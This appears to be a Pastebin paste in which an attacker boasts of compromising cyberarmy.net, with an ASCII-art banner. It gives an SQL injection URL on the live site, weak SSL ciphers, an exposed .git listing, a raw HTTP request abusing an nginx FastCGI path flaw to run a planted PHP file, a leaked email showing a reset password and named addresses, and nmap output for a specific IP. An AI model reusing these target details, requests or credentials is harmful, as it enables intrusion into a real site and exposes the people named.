Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- MMMMMMMMMMM M MMMMMMMMMM MM MMMMMMMM$ MMMMMMMMM MMMMMMMMMMM
- MMMMMMMMMMMMM MM =MMMMMMMMMM MM MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
- MMMMMMM MMMMMMM MM MMMMMMMMMMM ~M MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
- MMMMMMM IMMMMMM :M MMMMMMMMMMM M MMMMMMMMM OMMMMMMMMM MMMMMMM
- MMMMMMM IMMMMMM ,+ MMMMMMMMMMM7 M MMMMMMMMM MMMMMMMMMM MMMMMMM
- MMMMMMM IMMMMMM MMMMMMMMMMMM = MMMMMMMMMMMMMMMMMMMM MMMMMMM
- MMMMMMM M IMMMMM:MMMMMM ~ MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
- MMMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
- MMMMMMMMMMMMMMM MMMMMM +MMMMM= MMMMMMMMMMMMM$MMMMMM MMMMMMMMMMM
- MMMMMMM MMMMMM MMMMMM MMMMMM MMMMMM+MMMMMM MMMMMM MMMMMMM
- MMMMMMM MMMMMM MMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMM MMMMMMM
- DDDDDDD DDDDDD ?DDDDDDDDDDDDDD DDDDDD DDDDDD DDDDDD DDDDDDD
- 8888888 ~888888 888888888888888 888888 88888? 888888 88888888888
- =OOOOOOOOOOOOOO OOOOOOO OOOOOOZ OOOOOO OOOOO OOOOOO OOOOOOOOOOO
- NMMMMMN M ~IIIIII: IIIIIII IIIIIIIIIII IIIIIII= IIIIII
- ~MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
- MMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMMMM MMMMMM MMMMMM OMMMMM
- MMMMMMM MMMMMMM MMMMMM ~MMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMM=OMMMMMM MMMMMMM MMMMMM ?MMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
- MMMMMMM MMMMMMM =MMMMMMMMMMMM= MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
- MMMMMMM MMMMMMM MMMMMMMMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
- NNNNNNN NNNNNNN NNNNNNNNNNNN NNNNNNN NNNNNN NNNNNN MNNNNN
- DDDDDDD DDDDDDD DDDDDDDDDDDD DDDDDDD DDDDDD DDDDDD
- 8888888 8888888 ?88888888888 88888888888 888888 888888 888888
- OOOOOOOOOOOOO = OOOOOOOOOO, OOOOOOOOOOO OOOOOO OOOOOO OOOOOO
- ZZZZZZZZZZZ . ZZZZZZZZZZ ZZZZZZZZZZZ ZZZZZZ ZZZZZZ ZZZZZ
- ==============================================================================
- Target : www.cyberarmy.net
- ==============================================================================
- [*]SQL
- [+] Injection www.cyberarmy.net/mess/index.php?action=finishopenidlogin
- [-] DB Null %
- Fucking SQL Server With No Database!
- [+]SSL Fucked
- SSL_DES_64_CBC_WITH_MD5
- SSL_RC2_128_CBC_EXPORT40_WITH_MD5
- SSL_RC4_128_EXPORT40_WITH_MD5
- TLS_DHE_RSA_WITH_DES_CBC_SHA
- TLS_RSA_WITH_DES_CBC_SHA
- TLS_RSA_DES_40_SHA
- TLS_RSA_RC2_40_MD5
- TLS_RSA_RC4_40_MD5
- [*]Git Repository
- $ cd /usr/local/www/public/mess/.git/
- $ ls
- .gitignore
- COPYING
- EVENTS.txt
- Makefile
- README
- actions/accessadminpanel.php
- actions/accesstoken.php
- actions/all.php
- actions/allrss.php
- actions/apiaccountratelimitstatus.php
- ...
- [*]Nginx PHP code execution via FastCGI
- GET /GameOver.txt/hacked.php HTTP/1.1
- Cookie: PHPSESSID=5b68776ed8c3807c04116631346d8be2
- Host: cyberarmy.net
- Connection: Keep-alive
- Accept-Encoding: gzip,deflate
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
- Accept: */*
- Content-Length: 6
- www.cyberarmy.net/GameOver.txt/hacked.php
- [*]IRC.CyberArmy.Net Fucked
- eY3OwNYoUaLL fucked irc.cyberarmy.net
- er1cbrux!efnet@icerslair.com> From: "CyberArmy"
- er1cbrux!efnet@icerslair.com> <webmaster@cyberarmy.net>
- er1cbrux!efnet@icerslair.com> To: "ViRsOveRiD"
- er1cbrux!efnet@icerslair.com> <sirexar@crazy-horse.net>
- er1cbrux!efnet@icerslair.com> Date: 28 Oct 2004, 01:09:30 PM
- er1cbrux!efnet@icerslair.com> Subject: Password Successfully Reset
- er1cbrux!efnet@icerslair.com> (virsoverid)
- er1cbrux!efnet@icerslair.com>
- er1cbrux!efnet@icerslair.com> ----------------------------------------
- er1cbrux!efnet@icerslair.com> ---------------------------------------
- er1cbrux!efnet@icerslair.com>
- er1cbrux!efnet@icerslair.com> The following is an automated email from
- er1cbrux!efnet@icerslair.com> CyberArmy.
- er1cbrux!efnet@icerslair.com>
- er1cbrux!efnet@icerslair.com> Hello,virsoverid
- er1cbrux!efnet@icerslair.com> This is a confirmation that your
- er1cbrux!efnet@icerslair.com> CyberArmy password
- er1cbrux!efnet@icerslair.com> has been reset to: 19aHPxl6
- er1cbrux!efnet@icerslair.com>
- er1cbrux!efnet@icerslair.com> --
- ==============================================================================
- [+]Ports (Zues Botnet Hosted)
- [*]22/tcp on 78.47.201.59
- [*]25/tcp on 78.47.201.59
- [*]80/tcp on 78.47.201.59
- [*]443/tcp on 78.47.201.59
- [*]53/tcp on 78.47.201.59
- [*]9001/tcp on 78.47.201.59
- citadel.cyberarmy.net
- ------------------------------------------------------------------------------
- 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
- [*]ssh-hostkey: 1024 63:67:96:94:fd:65:b5:e0:f0:d8:d2:d3:ef:c9:8e:b8 (DSA)
- [*]2048 ff:c2:0f:2a:24:62:3c:3d:88:cd:6f:bd:c1:c1:5e:0c (RSA)
- ------------------------------------------------------------------------------
- 25/tcp open smtp Sendmail 8.14.4/8.14.4
- [*]smtp-commands: citadel.cyberarmy.net Hello [209.126.156.136], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
- [*]2.0.0 This is sendmail version 8.14.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
- ------------------------------------------------------------------------------
- 53/tcp open domain ISC BIND 9.6.-ESV-R3
- [*]dns-nsid:
- [*]bind.version: 9.6.-ESV-R3
- ------------------------------------------------------------------------------
- 80/tcp open http nginx 1.0.4
- [*]http-favicon: Unknown favicon MD5: B55D9F9D989F354D30F36BDBE863A43D
- [*]http-methods: No Allow or Public header in OPTIONS response (status code 301)
- [*]http-robots.txt: 2 disallowed entries
- [*]/wiki/Special /wiki/index.php
- [*]http-title: cyberarmy
- [*]Requested resource was http://cyberarmy.net/
- ------------------------------------------------------------------------------
- 443/tcp open http nginx 1.0.4
- [*]http-methods: No Allow or Public header in OPTIONS response (status code 400)
- [*]http-title: 400 The plain HTTP request was sent to HTTPS port
- [*]ssl-cert: Subject: commonName=cyberarmy.net
- [*]Issuer: commonName=PositiveSSL CA/organizationName=Comodo CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- [*]Public Key type: rsa
- [*]Public Key bits: 2048
- [*]Not valid before: 2010-02-17T00:00:00+00:00
- [*]Not valid after: 2011-02-17T23:59:59+00:00
- [*]MD5: 687f 0fb1 c115 7c8e e9b4 e484 1d35 7c98
- [*]SHA-1: 2ad7 17f9 64b4 0aa1 3299 5d2b 1aea 6900 2711 93f7
- [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
- [*]sslv2: server still supports SSLv2
- ------------------------------------------------------------------------------
- 9001/tcp open ssl/tor-orport?
- [*]ssl-cert: Subject: commonName=www.ltfyd4rl5ma.net
- [*]Issuer: commonName=www.4k56hozvhnjr35am5.net
- [*]Public Key type: rsa
- [*]Public Key bits: 1024
- [*]Not valid before: 2013-01-08T08:24:25+00:00
- [*]Not valid after: 2013-01-08T10:24:25+00:00
- [*]MD5: 201a 82a0 1af8 d425 1196 dec2 b379 2f0d
- [*]SHA-1: ff9c 11ce 8087 310c 24c5 9722 e1d2 48d8 54ed 0984
- [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
- ------------------------------------------------------------------------------
- Zues Botnet Hosted On citadel.cyberarmy.net
- [*]9090/tcp closed zeus-admin
- [*]9091/tcp closed xmltec-xmlmail
- ==============================================================================
- [+]Operating System
- Running: FreeBSD 7.X
- OS CPE: cpe:/o:freebsd:freebsd:7
- OS details: FreeBSD 7.1-PRERELEASE 7.2-STABLE, FreeBSD 7.2-RELEASE - 8.0-RELEASE
- Uptime guess: 0.000 days (since Tue Jan 08 00:57:27 2013)
- IP ID Sequence Generation: Busy server or unknown class
- Service Info: OSs: FreeBSD, Unix; CPE: cpe:/o:freebsd:freebsd
- ==============================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement